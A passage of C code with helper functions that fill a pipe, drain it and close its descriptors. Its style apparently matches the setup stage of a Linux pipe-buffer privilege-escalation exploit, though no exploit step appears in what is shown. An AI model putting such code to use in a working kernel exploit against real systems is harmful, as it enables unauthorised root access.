            perror("write to pipe failed");
            exit(1);
        }
        if(nr == 0){
            /* No progress: bail out rather than spin forever. */
            fputs("[x]write to pipe made no progress\n", stderr);
            exit(1);
        }
        pipe_size -= (int)nr;
    }
    printf("[*]Fill the pipe done...\n");
}

/*
 * Read from the pipe's read end until as many bytes as the pipe size
 * reported by F_GETPIPE_SZ have been read back.
 *
 * my_pipe: descriptor pair; my_pipe[1] is queried, my_pipe[0] is read.
 *
 * Exits with status 1 if the size query fails, a read fails, or a read
 * returns 0 before the expected amount was drained. Previously a -1 or 0
 * return left the remaining count unchanged or growing, so the loop never
 * terminated.
 */
void drain_pipe(int *my_pipe){
    char buffer[PAGE_SIZE] = {0};
    int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);
    ssize_t nr = 0;

    if(pipe_size < 0){
        perror("F_GETPIPE_SZ failed");
        exit(1);
    }
    printf("[*]pipe_size is %d\n", pipe_size);
    while(pipe_size > 0){
        size_t chunk = (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size);

        nr = read(my_pipe[0], buffer, chunk);
        if(nr < 0){
            perror("read from pipe failed");
            exit(1);
        }
        if(nr == 0){
            fputs("[x]pipe reached end of file before it was drained\n", stderr);
            exit(1);
        }
        pipe_size -= (int)nr;
    }
    printf("[*]Drain the pipe done...\n");
}

/*
 * Release the pipe by closing both of its descriptors.
 *
 * my_pipe: descriptor pair to close. The parameter is named my_pipe, as in
 * the forward declaration, so that it no longer shadows the libc pipe()
 * function inside this body.
 */
void free_env(int *my_pipe){
    /* 1. Free the pipe */
    close(my_pipe[0]);
    close(my_pipe[1]);
}